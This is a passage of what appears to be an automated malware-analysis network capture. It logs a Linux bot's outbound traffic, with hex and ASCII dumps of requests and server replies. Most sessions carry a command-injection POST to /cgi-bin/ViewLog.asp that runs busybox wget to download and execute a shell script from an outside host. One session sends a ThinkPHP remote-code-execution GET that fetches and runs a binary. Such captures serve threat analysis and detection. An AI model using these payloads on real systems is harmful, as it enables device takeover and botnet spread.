URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.950c1502.1700638683.11e42035</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.23	53650	85.89.180.130	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:03.637237072 CET	1762	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:07.889465094 CET	2219	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:08.113442898 CET	2220	IN	HTTP/1.1 500 Server Error Server: Microsoft-IIS/5.1 Date: Wed, 22 Nov 2023 07:38:08 GMT Connection: close Content-Type: text/html Content-Length: 86 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 50 61 72 61 6d 65 74 72 20 6a 65 73 74 20 6e 69 65 70 6f 70 72 61 77 6e 79 2e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Error</title></head><body>Parametr jest niepoprawny. </body></html>
Nov 22, 2023 08:38:08.113456964 CET	2221	IN	HTTP/1.1 100 Continue Server: Microsoft-IIS/5.1 Date: Wed, 22 Nov 2023 07:38:08 GMT X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.23	36508	88.221.241.235	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:03.697866917 CET	1764	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:04.092679977 CET	1768	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:38:03 GMT Date: Wed, 22 Nov 2023 07:38:03 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 66 30 39 30 65 63 34 26 23 34 36 3b 31 37 30 30 36 33 38 36 38 33 26 23 34 36 3b 31 61 38 38 37 63 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.2f090ec4.1700638683.1a887c9</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.23	54034	206.2.175.196	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:04.229450941 CET	1768	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 38 3a 30 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:38:09Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.23	54048	206.2.175.196	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:04.573271036 CET	1803	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 38 3a 30 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:38:09Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.23	54022	94.111.35.46	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:04.864355087 CET	1867	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.23	37116	94.199.160.127	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:04.874989986 CET	1867	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:05.104654074 CET	1880	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.23	54050	206.2.175.196	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:04.917129040 CET	1868	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 38 3a 30 39 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:38:09Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.23	48174	94.121.113.53	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:05.083811998 CET	1879	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.23	49652	31.200.120.27	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:05.097702980 CET	1880	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.23	54064	206.2.175.196	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:05.260905981 CET	1882	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 38 3a 31 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:38:10Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.23	54070	206.2.175.196	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:05.604820967 CET	1978	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 38 3a 31 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:38:10Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.23	54072	206.2.175.196	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:05.948297024 CET	1980	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 38 3a 31 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:38:10Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.23	54076	206.2.175.196	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:06.292114019 CET	1991	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 38 3a 31 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:38:11Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.23	42528	94.140.0.25	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:06.453881025 CET	2075	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.23	54080	206.2.175.196	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:06.638362885 CET	2089	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 38 3a 31 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:38:11Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.23	57912	31.207.37.146	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:06.759388924 CET	2090	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:06.940825939 CET	2096	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:06 GMT Server: Apache/2.4.25 (Debian) Content-Length: 362 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.23	58400	31.136.81.198	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:06.761635065 CET	2091	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:07.345501900 CET	2134	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:08.465354919 CET	2254	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:10.705029011 CET	2562	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:15.312405109 CET	3058	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:24.271229029 CET	4135	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:42.956491947 CET	6358	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:19.815351009 CET	10958	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.23	50870	31.136.236.150	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:06.762104988 CET	2092	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:07.345504045 CET	2134	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
